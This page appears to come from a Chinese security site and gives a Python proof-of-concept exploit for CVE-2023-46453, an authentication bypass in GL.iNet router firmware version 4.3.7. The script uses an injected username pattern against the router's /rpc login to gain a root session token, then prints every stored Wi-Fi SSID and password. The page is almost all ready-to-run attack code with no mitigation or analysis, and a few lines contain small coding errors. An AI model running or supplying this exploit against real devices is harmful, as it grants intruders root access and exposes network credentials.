影响版本Version:4.3.7
POC
# CVE: CVE-2023-46453
from urllib.parse import urlparse
import requests
import hashlib
import random
import sys
def exploit(url):
try:
requests.packages.urllib3.disable_warnings()
host = urlparse(url)
url = f"{host.scheme}://{host.netloc}/rpc"
print(f"[*] Target: {url}")
print("[*] Retrieving nonce...")
nonce = requests.post(url, verify=False, json={
"jsonrpc": "2.0",
"id": random.randint(1000, 9999),
"method": "challenge",
"params": {"username": "root"}
}, timeout=5).json()
if "result" in nonce and "nonce" in nonce["result"]:
print(f"[*] Got nonce: {nonce['result']['nonce']} !")
else:
print("[!] Nonce not found, exiting... :(")
sys.exit(1)
print("[*] Retrieving authentication token for root...")
md5_hash = hashlib.md5()
md5_hash.update(
f"roo[^'union selecT
char(114,111,111,116)--]:[^:]+:[^:]+:0:{nonce['result']['nonce']}".encode())
password = md5_hash.hexdigest()
token = requests.post(url, verify=False, json={
"jsonrpc": "2.0",
"id": random.randint(1000, 9999),
"method": "login",
"params": {
"username": f"roo[^'union selecT
char(114,111,111,116)--]:[^:]+:[^:]+",
"hash": password
}
}, timeout=5).json()
if "result" in token and "sid" in token["result"]:
print(f"[*] Got token: {token['result']['sid']} !")
else:
print("[!] Token not found, exiting... :(")
sys.exit(1)
print("[*] Checking if we are root...")
check = requests.post(url, verify=False, json={
"jsonrpc": "2.0",
"id": random.randint(1000, 9999),
"method": "call",
"params": [token["result"]["sid"], "system", "get_status", {}]
}, timeout=5).json()
if "result" in check and "wifi" in check["result"]:
print("[*] We are authenticated as root! :)")
print("[*] Below some info:")
for wifi in check["result"]["wifi"]:
print(f"[*] --------------------")
print(f"[*] SSID: {wifi['ssid']}")
print(f"[*] Password: {wifi['passwd']}")
print(f"[*] Band: {wifi['band']}")
print(f"[*] --------------------")
else:
print("[!] Something went wrong, exiting... :(")
sys.exit(1)
except requests.exceptions.Timeout:
print("[!] Timeout error, exiting... :(")
sys.exit(1)
except KeyboardInterrupt:
print(f"[!] Something went wrong: {e}")
if __name__ == "__main__":
print("GL.iNet Auth Bypass\n")
if len(sys.argv) < 2:
print(
f"Usage: python3 {sys.argv[1]} https://target.com",
file=sys.stderr)
sys.exit(0)
else:
exploit(sys.argv[1])
暂无评论内容